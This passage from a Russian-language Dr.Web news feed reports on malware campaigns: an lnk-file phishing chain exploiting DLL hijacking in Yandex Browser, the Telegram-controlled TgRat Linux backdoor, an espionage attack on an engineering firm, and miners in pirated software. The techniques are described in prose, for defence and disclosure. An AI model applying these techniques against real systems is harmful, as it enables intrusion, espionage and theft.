&lt;p&gt;Для реализации атаки киберпреступники отправили на электронный адрес компании фишинговое письмо, замаскированное под резюме соискателя вакансии. К письму был приложен архив, якобы содержащий PDF-файл с анкетой. Этот файл имел «двойное» расширение &lt;span class="string"&gt;.pdf.lnk&lt;/span&gt;. Сокрытие вредоносных объектов при использовании двойных расширений — довольно частая тактика злоумышленников, которой они пользуются для того, чтобы вводить своих жертв в заблуждение. По умолчанию ОС Windows скрывает расширения файлов для удобства пользователя. А если файл имеет «двойное» расширение, то система скрывает только последнее из них. Таким образом, в данном случае жертва могла видеть первое расширение — &lt;span class="string"&gt;.pdf&lt;/span&gt;, а расширение &lt;span class="string"&gt;.lnk&lt;/span&gt; было скрыто. Отметим, что даже при включенном отображении полных имен файлов расширение &lt;span class="string"&gt;.lnk&lt;/span&gt; всегда скрывается ОС.&lt;/p&gt;

&lt;blockquote&gt;Идея компрометации систем посредством lnk-файлов не нова. Наиболее знаковая атака произошла в 2010 году, когда оборудование для обогащения урана в иранском городе Нетенз подверглось беспрецедентному кибервоздействию со стороны злоумышленников. Червь под название Stuxnet атаковал ПЛК, управляющие газовыми центрифугами, выводя последние на запредельную скорость вращения, а затем резко останавливая, из-за чего происходило разрушение их корпусов. Помимо порчи оборудования этот червь инфицировал более 200 000 компьютеров во многих странах мира. Основным вектором атаки был lnk-файл, который попал на управляющий компьютер предприятия на USB-носителе. А для запуска вредоносного достаточно было лишь перейти в папку, содержащую специально сформированный lnk-файл. В рамках атаки было задействовано 4 уязвимости нулевого дня, в частности эксплойт CPLINK, что позволило запустить червя Stuxnet без участия пользователя.&lt;/blockquote&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/malicious_pdf_lnk.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/malicious_pdf_lnk.1.png" alt="Метаданные, хранящиеся в lnk-файле"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Метаданные, хранящиеся в lnk-файле&lt;/em&gt;&lt;/p&gt;
 
&lt;p&gt;Истинное расширение &lt;span class="string"&gt;.lnk&lt;/span&gt; является расширением ярлыков в ОС Windows. В поле «Объект» (Target) можно указать путь до любого объекта ОС — например, исполняемого файла — и запустить его с требуемыми параметрами. В рамках этой атаки скрытно происходил запуск интерпретатора команд PowerShell, скачивавший с сайта злоумышленников два вредоносных скрипта, каждый из которых запускал свою полезную нагрузку.&lt;/p&gt;
 
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/Attack chain_RU.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/Attack chain_RU.1.png" alt="Схема атаки"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Схема атаки&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Первая из них представляла собой отвлекающий PDF, а также исполняемый файл с названием &lt;span class="string"&gt;YandexUpdater.exe&lt;/span&gt;, маскирующийся под компонент для обновления Яндекс Браузера (название реального компонента — &lt;span class="string"&gt;service_update.exe&lt;/span&gt;). Данный исполняемый файл представляет собой дроппер трояна &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.46324&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.46324&lt;/b&gt;&lt;/a&gt;, который после ряда проверок, направленных на выявление факта запуска в эмулируемом окружении и наличия ПО для отладки, распаковывал в скомпрометированной системе трояна &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen28.53599&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen28.53599&lt;/b&gt;&lt;/a&gt;. Последний имеет возможность удаленного управления, выполняет сбор системной информации и скачивание различных вредоносных модулей. Помимо данных функций троян также обладает возможностями по противодействию отладке. При выявлении процессов антивирусов, виртуальных машин и отладчиков троян перезаписывает свой файл нулями и удаляет его вместе с папкой, в которой он хранился.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/decoy_pdf.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/decoy_pdf.1.png" alt="Отвлекающий PDF-файл"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Отвлекающий PDF-файл&lt;/em&gt;&lt;/p&gt;
 
&lt;p&gt;Вторая полезная нагрузка состояла из отвлекающего PDF-файла и трояна &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen27.11306&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen27.11306&lt;/b&gt;&lt;/a&gt;. Данный троян представляет собой динамическую библиотеку (DLL) с зашифрованной полезной нагрузкой. Особенность данного трояна заключается в том, что он эксплуатирует уязвимость Яндекс Браузера к перехвату порядка поиска DLL (DLL Search Order Hijacking). В ОС Windows DLL-файлы представляют собой библиотеки, которые используются приложениями для хранения функций, переменных и элементов интерфейса. В момент своего запуска приложения выполняют поиск библиотек в различных хранилищах данных в определенном порядке, поэтому злоумышленники могут попытаться «пролезть без очереди» и поместить вредоносную библиотеку в ту папку, где поиск DLL происходит с наибольшим приоритетом.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/DLL Search Order_RU.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/DLL Search Order_RU.1.png" alt="Упрощенная схема приоритета поиска библиотек"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Упрощенная схема приоритета поиска библиотек&lt;/em&gt;&lt;/p&gt;
 
&lt;p&gt;Данный троян сохраняется в скрытую папку &lt;span class="string"&gt;%LOCALAPPDATA%\Yandex\YandexBrowser\Application&lt;/span&gt; под именем &lt;span class="string"&gt;Wldp.dll&lt;/span&gt;. Именно в этот каталог устанавливается Яндекс Браузер, и там же браузер будет искать необходимые ему библиотеки при запуске. В свою очередь, легитимная библиотека &lt;span class="string"&gt;Wldp.dll&lt;/span&gt;, функция которой заключается в обеспечении безопасности запуска приложений, является системной библиотекой ОС и находится в папке &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt;. А так как вредоносная библиотека располагается в папке установки Яндекс Браузера, то первой будет загружаться именно она. При этом она получает все разрешения основного приложения: может выполнять команды и создавать процессы от имени браузера, а также наследовать правила брандмауэра для доступа в интернет.&lt;/p&gt;

&lt;p&gt;После запуска браузера вредоносная библиотека &lt;span class="string"&gt;Wldp.dll&lt;/span&gt; расшифровывает зашитую в нее полезную нагрузку. Следует отметить, что расшифровка выполняется дважды. В первый раз она производится с помощью ключа, создаваемого на основе хеша пути, по которому расположена вредоносная DLL, а затем — с помощью глобального ключа, зашитого в тело трояна. Результатом расшифровки является шелл-код, выполнение которого позволяет злоумышленникам запустить в скомпрометированной системе приложение, написанное на языке .NET. В свою очередь, этот стейджер загружал из сети вредоносное ПО. К сожалению, на момент нашего расследования на сервере, с которым связывался загрузчик, искомый файл был недоступен, и нам не удалось узнать, какой конкретно троян скачивался в данном случае.&lt;/p&gt;

&lt;p&gt;Таким образом, мы видим многовекторную и многоступенчатую схему инфицирования одновременно двумя разными троянами, которые доставляются в скомпрометированную систему при открытии файла из фишингового письма. Несмотря на запутанную реализацию, методы профилактики и защиты от таких атак довольно просты. Они изложены ниже.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Повышение осведомленности сотрудников в вопросах информационной безопасности (внимательно проверять ссылки и имена файлов, не открывать подозрительные объекты и т. п.).&lt;/li&gt;
  &lt;li&gt;Использование программных продуктов, выполняющих фильтрацию писем, для предотвращения доставки вредоносных писем и вложений — например, &lt;a href="https://products.drweb.kz/mailserver/" target="_blank" rel="noopener noreferrer"&gt;Dr.Web Mail Security Suite&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;Установка на всех узлах сети антивирусного ПО, которое не пропустит опасный файл при работе в интернете или заблокирует подозрительную активность на компьютерах пользователей, если файл был доставлен на USB-носителе — например, &lt;a href="https://products.drweb.kz/workstations/" target="_blank" rel="noopener noreferrer"&gt;Dr.Web Desktop Security Suite&lt;/a&gt; и &lt;a href="https://products.drweb.kz/fileserver/" target="_blank" rel="noopener noreferrer"&gt;Dr.Web Server Security Suite&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;Своевременное обновление ПО, в рамках которого устраняются программные ошибки.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;После обнаружения эксплуатации уязвимости в Яндекс Браузере мы передали информацию о ней в компанию Яндекс. Разработчики оперативно отреагировали на наше сообщение, в результате чего была выпущена версия Яндекс Браузера 24.7.1.380 с исправлением, а найденной уязвимости был присвоен идентификатор &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6473" target="_blank" rel="noopener noreferrer"&gt;CVE-2024-6473&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;В дальнейшем мы координировали дату публикации этой новости с разработчиками браузера, чтобы дать возможность пользователям получить исправленную версию Яндекс Браузера до обнародования подробностей об этой атаке.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/APT_rail_transportation_operator/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14877&amp;lng=kk</guid><title>И полетят тут телеграммы: троян-бэкдор с управлением через Telegram атакует серверы на ОС Linux</title><link>https://news.drweb.kz/show/?i=14877&amp;lng=kk&amp;c=23</link><pubDate>Thu, 04 Jul 2024 15:44:12 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;4 июля 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Специалисты компании «Доктор Веб» выявили Linux-версию известного трояна TgRat, применяемого для целевых атак на компьютеры. Одной из примечательных особенностей данного трояна является то, что он управляется посредством Telegram-бота.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Это вредоносное ПО принадлежит к типу троянов удалённого доступа, более известному под довольно неблагозвучной, но очень меткой аббревиатурой RAT (в переводе с английского «крыса»). По своей сути «ратники» — это привычные средства удалённого доступа и администрирования, но работающие на злоумышленников. Основное отличие заключается в том, что атакуемый пользователь не должен заподозрить, что на его машине хозяйничает кто-то другой.&lt;/p&gt;
&lt;p&gt;Изначально троян TgRat, написанный для ОС Windows, был выявлен в 2022 году. Он представлял собой небольшую вредоносную программу, предназначенную для выгрузки данных с конкретной скомпрометированной машины. Не так давно вирусные аналитики компании «Доктор Веб» обнаружили его собрата, адаптированного для работы в ОС Linux.&lt;/p&gt;
&lt;p&gt;Запрос на расследование инцидента информационной безопасности поступил в нашу вирусную лабораторию от компании, предоставляющей услуги хостинга. Антивирус Dr.Web обнаружил подозрительный файл на сервере одного из клиентов. Им оказался &lt;a href="https://vms.drweb.kz/virus/?i=Linux.MulDrop.135" target="_blank"&gt;дроппер трояна&lt;/a&gt;, то есть программа, которая предназначена для установки вредоносного ПО на атакуемый компьютер. Этот дроппер распаковывал в систему троян &lt;a href="https://vms.drweb.kz/search/?q=Linux.BackDoor.TgRat.2&amp;lng=kk"&gt;&lt;b&gt;Linux.BackDoor.TgRat.2&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Этот троян также создавался для атаки на конкретные компьютеры: при запуске он сверяет хеш имени машины со строкой, вшитой в тело трояна. Если значения не совпадают, TgRat завершает свой процесс. А в случае успешного запуска троян подключается к сети и реализует довольно необычную схему взаимодействия со своим управляющим сервером, в качестве которого выступает Telegram-бот.&lt;/p&gt;

&lt;blockquote&gt;Мессенджер Telegram довольно часто используется во многих компаниях в качестве корпоративного средства общения. Поэтому нет ничего удивительного в том, что злоумышленники могут эксплуатировать его в качестве канала для управления вредоносным ПО и кражи конфиденциальной информации: популярность программы и рутинность трафика к серверам Telegram способствуют маскировке вредоносного ПО в скомпрометированной сети.&lt;/blockquote&gt;

&lt;p&gt;Управление трояном осуществляется через закрытую группу в мессенджере, к которой подключен Telegram-бот. Используя мессенджер, злоумышленники могут отдавать команды трояну: например, скачать со скомпрометированной системы файлы, сделать снимок экрана, удалённо выполнить команду или загрузить файл, используя вложения.&lt;/p&gt;

&lt;div class="margTM margBM column_grid_review column_grid_review--o"&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/july/Linux.BackDoor.TgRat.2_1.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/july/Linux.BackDoor.TgRat.2_1.png" alt="Android.Click.414.origin"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
 
&lt;p&gt;В отличие от своего собрата для Windows, код этого трояна был зашифрован шифром RSA, а для выполнения команд использовался интерпретатор bash, что позволяло выполнять целые скрипты в рамках одного сообщения. Каждый экземпляр трояна имеет свой собственный идентификатор — таким образом злоумышленники могли отправлять команды нескольким ботам, подключив их все к одному чату.&lt;/p&gt;
 
&lt;div class="margTM margBM column_grid_review column_grid_review--o"&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/july/Linux.BackDoor.TgRat.2_2.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/july/Linux.BackDoor.TgRat.2_2.png" alt="Android.Click.414.origin"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;div class="margTM margBM column_grid_review column_grid_review--o"&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/july/Linux.BackDoor.TgRat.2_3.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/july/Linux.BackDoor.TgRat.2_3.png" alt="Android.Click.414.origin"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt; 

&lt;p&gt;Данная атака, несмотря на её необычность в плане выбора схемы взаимодействия между трояном и управляющим сервером, может быть выявлена при внимательном анализе сетевого трафика: обмен данными с серверами Telegram может быть характерным для пользовательских компьютеров, но никак не для сервера в локальной сети.&lt;/p&gt;

&lt;p&gt;Для профилактики заражения мы рекомендуем устанавливать антивирусное ПО на все узлы локальной сети. Антивирусные решения &lt;a href="https://products.drweb.kz/for_biz/" target="_blank"&gt;линейки Dr.Web Enterprise Security Suite&lt;/a&gt; для серверов и рабочих станций на базе ОС Windows, macOS, Android, Linux и FreeBSD надежно защищают наших корпоративных клиентов. А для NGFW- и IDS-устройств на сетевом периметре компания «Доктор Веб» предлагает &lt;a href="https://partners.drweb.kz/tech_partners/" target="_blank" rel="noopener noreferrer"&gt;решение на базе технологии потокового сканирования трафика&lt;/a&gt;, которое позволяет проверять сетевой трафик с практически нулевой задержкой.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Linux.BackDoor.TgRat.2" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14823&amp;lng=kk</guid><title>Исследование целевой атаки на российское предприятие машиностроительного сектора</title><link>https://news.drweb.kz/show/?i=14823&amp;lng=kk&amp;c=23</link><pubDate>Mon, 11 Mar 2024 09:38:53 GMT</pubDate><description>&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/march/study_of_a_targeted_attack_on_a_russian_enterprise_in_the_mechanical_engineering_sector_ru.pdf" class="Btn bg_main_green_5 widthCaptcha"&gt;
    &lt;span class="Btn-body icon icon_right" data-icon="#common-arrowRight"&gt;
      &lt;span class="Btn-text"&gt;Скачать в PDF&lt;/span&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;&lt;b&gt;11 марта 2024 года&lt;/b&gt;&lt;/p&gt;

&lt;h3 class="fontL"&gt;Введение&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;В октябре 2023 года в компанию «Доктор Веб» обратилось российское предприятие машиностроительного сектора с подозрением на присутствие ВПО на одном из своих компьютеров. Наши специалисты расследовали этот инцидент и установили, что пострадавшая компания столкнулась с целевой атакой. В ходе ее проведения злоумышленники рассылали по электронной почте фишинговые сообщения с прикрепленной вредоносной программой, отвечающей за первоначальное заражение системы и установку в нее других вредоносных инструментов.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Целью этой атаки был сбор чувствительной информации о сотрудниках, получение данных об инфраструктуре компании и ее внутренней сети. Кроме того, мы зафиксировали факт выгрузки данных с зараженного компьютера ― как в виде хранившихся на компьютере файлов, так и в виде снимков экрана, созданных во время работы ВПО.&lt;/p&gt;


&lt;h3 class="fontL"&gt;Общие сведения об атаке и используемые инструменты&lt;/h3&gt;

&lt;p&gt;В начале октября 2023 года злоумышленники отправили на электронный адрес  пострадавшей компании несколько фишинговых писем с темой «расследования» неких уголовных дел по уклонению от уплаты налогов. Письма отправлялись якобы от имени следователя Следственного Комитета Российской Федерации и содержали два вложения. Первым был защищенный паролем zip-архив. Он скрывал в себе вредоносную программу, при запуске которой начиналось заражение системы. Вторым был pdf-документ, который не являлся вредоносным. Он содержал фишинговый текст о том, что вся информация об «уголовном деле» находится в архиве, и побуждал открыть вредоносную программу из него.&lt;/p&gt;

&lt;p&gt;Самое первое фишинговое письмо содержало архив &lt;span class="string"&gt;Трeбoвaниe 19098 Cлед ком РФ от 02.10.23 ПАРОЛЬ - 123123123.zip&lt;/span&gt;. В свою очередь, расположенная в нем троянская программа скрывалась в файле &lt;span class="string"&gt;Перечень юридических лиц и предприятий, уклонение от уплаты налогов, требования и дополнительные.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Одним из последних отправленных сообщений стало следующее:&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/february/mail_1.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/february/mail_1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;К нему был прикреплен фишинговый pdf-документ &lt;span class="string"&gt;Требование следователя, уклонение от уплаты налогов (запрос в рамках УД).pdf&lt;/span&gt; и zip-архив &lt;span class="string"&gt;Трeбoвaниe 19221 СК РФ от 11.10.2023 ПАРОЛЬ - 123123123.zip&lt;/span&gt; с таким содержимым:&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/february/mail_2.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/february/mail_2.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;Как и в более ранних сообщениях, пароль для извлечения файлов из архива атакующие указали и в его названии, и в имени документа &lt;span class="string"&gt;Пароль для открытия 123123123.odt&lt;/span&gt;. Сам этот документ, как и файлы &lt;span class="string"&gt;Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.pdf&lt;/span&gt; и &lt;span class="string"&gt;СК РФ.png&lt;/span&gt;, не являлись вредоносными.&lt;/p&gt;

&lt;p&gt;В этом архиве находилось две копии вредоносной программы: &lt;span class="string"&gt;Перечень предприятий, уклонение от уплаты налогов, а также дополнительные материалы.exe&lt;/span&gt; и &lt;span class="string"&gt;Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Во всех случаях распространяемым злоумышленниками вредоносным приложением был &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen21.39882&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen21.39882&lt;/b&gt;&lt;/a&gt;. Эта вредоносная программа, известная как WhiteSnake Stealer, продается в теневом сегменте интернета (Даркнете) и используется для кражи учетных записей от различного ПО, а также других данных. Кроме того, она может загружать и устанавливать на атакуемые компьютеры другие вредоносные приложения. В рассматриваемой целевой атаке ей отводилась роль первой ступени заражения. Получив соответствующие команды, вредоносная программа собрала и передала злоумышленникам информацию о конфигурации профилей Wi-Fi-сетей инфицированной системы, а также пароли доступа к ним. Затем она запустила SSH-прокси-сервер и установила в систему вторую ступень.&lt;/p&gt;

&lt;p&gt;Второй ступенью и одновременно главным инструментом злоумышленников стала вредоносная программа-бэкдор &lt;a href="https://vms.drweb.kz/search/?q=JS.BackDoor.60&amp;lng=kk"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt; ― через нее проходило основное взаимодействие между атакующими и зараженным компьютером. Одной из особенностей бэкдора является то, что он использует собственный фреймворк на языке JavaScript. Троян состоит из основного обфусцированного тела, а также вспомогательных модулей, которые благодаря специфике архитектуры вредоносной программы одновременно являются и ее частью, и задачами, которые та исполняет через общие с ними JavaScript-функции. Новые задачи поступают трояну с управляющего сервера и фактически превращают его в многокомпонентную угрозу с расширяемой функциональностью, что позволяет применять его в качестве мощного инструмента кибершпионажа.&lt;/p&gt;

&lt;p&gt;Интересен и механизм, с помощью которого &lt;a href="https://vms.drweb.kz/search/?q=JS.BackDoor.60&amp;lng=kk"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt; обеспечивал возможность своего автозапуска. Наряду с одним из традиционных способов ― внесением необходимых изменений в реестр Windows ― троян особым образом модифицировал файлы ярлыков (&lt;span class="string"&gt;.lnk&lt;/span&gt;). Для этого он проверял содержимое ряда системных каталогов, включая каталог рабочего стола и панели задач, и всем найденным в них ярлыкам, кроме &lt;span class="string"&gt;Explorer.lnk&lt;/span&gt; или &lt;span class="string"&gt;Проводник.lnk&lt;/span&gt;, целевым приложением для запуска назначал &lt;span class="string"&gt;wscript.exe&lt;/span&gt;. При этом для его запуска указывались специальные аргументы, одним из которых был альтернативный поток данных (ADS), в который записывалось тело бэкдора. В результате изменений модифицированные ярлыки вначале запускали &lt;a href="https://vms.drweb.kz/search/?q=JS.BackDoor.60&amp;lng=kk"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt;, а уже после ― исходные программы.&lt;/p&gt;

&lt;p&gt;На протяжении всей атаки злоумышленники активно направляли бэкдору различные команды и с его помощью похитили с зараженного компьютера содержимое десятков каталогов, которые содержали как личные, так и корпоративные данные. Кроме того, мы зафиксировали факт создания трояном снимков экрана (скриншотов).&lt;/p&gt;

&lt;p&gt;Дополнительным инструментом слежки в рассматриваемой атаке стала вредоносная программа &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.SpyBotNET.79&amp;lng=kk"&gt;&lt;b&gt;BackDoor.SpyBotNET.79&lt;/b&gt;&lt;/a&gt;, которая использовалась для аудиопрослушивания и записи разговоров через подключенный к зараженному компьютеру микрофон. Этот троян записывал аудио только в том случае, если фиксировал определенную интенсивность звука ― в частности, характерную для голоса.&lt;/p&gt;

&lt;p&gt;При этом атакующие пытались также заразить систему трояном-загрузчиком &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader46.24755&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader46.24755&lt;/b&gt;&lt;/a&gt;, однако из-за возникшей ошибки сделать это им не удалось.&lt;/p&gt;

&lt;p&gt;Хронология атаки представлена на следующей схеме:&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/february/timeline_1_ru.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/february/timeline_1_ru.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt; 

&lt;p&gt;Хронология получения задач трояном &lt;a href="https://vms.drweb.kz/search/?q=JS.BackDoor.60&amp;lng=kk"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt;:&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/february/timeline_2_ru.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/february/timeline_2_ru.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt; 

&lt;p&gt;Проведенный нашими специалистами анализ не показал однозначную причастность к данной атаке какой-либо из ранее известных APT-группировок.&lt;/p&gt;

&lt;p&gt;Подробные технические описания обнаруженных вредоносных программ находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».&lt;/p&gt;

&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen21.39882&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen21.39882&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=JS.BackDoor.60&amp;lng=kk"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.SpyBotNET.79&amp;lng=kk"&gt;&lt;b&gt;BackDoor.SpyBotNET.79&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader46.24755&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader46.24755&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h3 class="fontL"&gt;Заключение&lt;/h3&gt;

&lt;p&gt;Использование вредоносных инструментов, которые доступны в качестве услуги на коммерческой основе (MaaS ― Malware as a Service), таких как &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen21.39882&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen21.39882&lt;/b&gt;&lt;/a&gt;, позволяет даже относительно неопытным злоумышленникам совершать весьма чувствительные атаки как на бизнес, так и на государственные структуры. В свою очередь, социальная инженерия по-прежнему представляет серьезную угрозу. Это относительно простой, но эффективный способ обойти выстроенную защиту, который могут использовать как опытные, так и начинающие киберпреступники. В связи с этим особенно важно обеспечивать защиту всей инфраструктуры предприятий, в том числе рабочих станций и шлюзов электронной почты. Кроме того, рекомендуется проводить периодический инструктаж сотрудников по теме информационной безопасности и знакомить их с актуальными цифровыми угрозами. Все эти меры помогут снизить вероятность возникновения киберинцидентов, а также минимизировать ущерб от атак.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/APT_JS.BackDoor.60/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14792&amp;lng=kk</guid><title>Скрытый майнер в пиратском ПО позволяет злоумышленникам обогащаться за счет своих жертв</title><link>https://news.drweb.kz/show/?i=14792&amp;lng=kk&amp;c=23</link><pubDate>Mon, 15 Jan 2024 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 января 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Компания «Доктор Веб» сообщает об участившихся случаях выявления троянов-майнеров для скрытой добычи криптовалюты в составе пиратского ПО, доступного в Telegram и на некоторых интернет-площадках.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;В декабре 2023 года сотрудники вирусной лаборатории «Доктор Веб» отметили рост числа детектирований трояна-майнера &lt;a href="https://vms.drweb.kz/search/?q=Trojan.BtcMine.3767&amp;lng=kk"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt; и связанного с ним &lt;a href="https://vms.drweb.kz/search/?q=Trojan.BtcMine.2742&amp;lng=kk"&gt;&lt;b&gt;Trojan.BtcMine.2742&lt;/b&gt;&lt;/a&gt;, которые, как выяснилось, попадали на компьютеры пользователей с пиратскими дистрибутивами различного программного обеспечения.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.BtcMine.3767&amp;lng=kk"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt; представляет собой троянскую программу для ОС Windows, написанную на языке С++. Это загрузчик майнера, созданный на базе проекта SilentCryptoMiner с открытым кодом. Основными источниками инфицированного данным трояном ПО являются Telegram канал t[.]me/files_f (более 5000 подписчиков), а также сайты itmen[.]software и soft[.]sibnet[.]ru. Отметим, что для последнего подготавливались отдельные сборки с использованием установщика NSIS. При этом после распаковки инсталляционного пакета были обнаружены пути, которые злоумышленники использовали для хранения исходных файлов трояна:&lt;/p&gt;
&lt;code&gt;&lt;pre&gt;
C:\bot_sibnet\Resources\softportal\exe\
C:\bot_sibnet\Resources\protect_build\miner\
&lt;/pre&gt;&lt;/code&gt;
&lt;p&gt;По данным вирусной лаборатории «Доктор Веб», за полтора месяца одна из кампаний по распространению данного трояна привела к заражению более 40 000 компьютеров. Однако, учитывая статистику просмотров публикаций в Telegram-канале и трафик сайтов, масштаб проблемы может оказаться ещё более значительным.&lt;/p&gt;

&lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/january/01_likessubs.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2024/january/01_likessubs.1.jpg" alt="Trojan.BtcMine.3767 и Trojan.BtcMine.2742"&gt;
      &lt;/a&gt;
    &lt;/div&gt;

    &lt;div class="flex fxCenter"&gt;
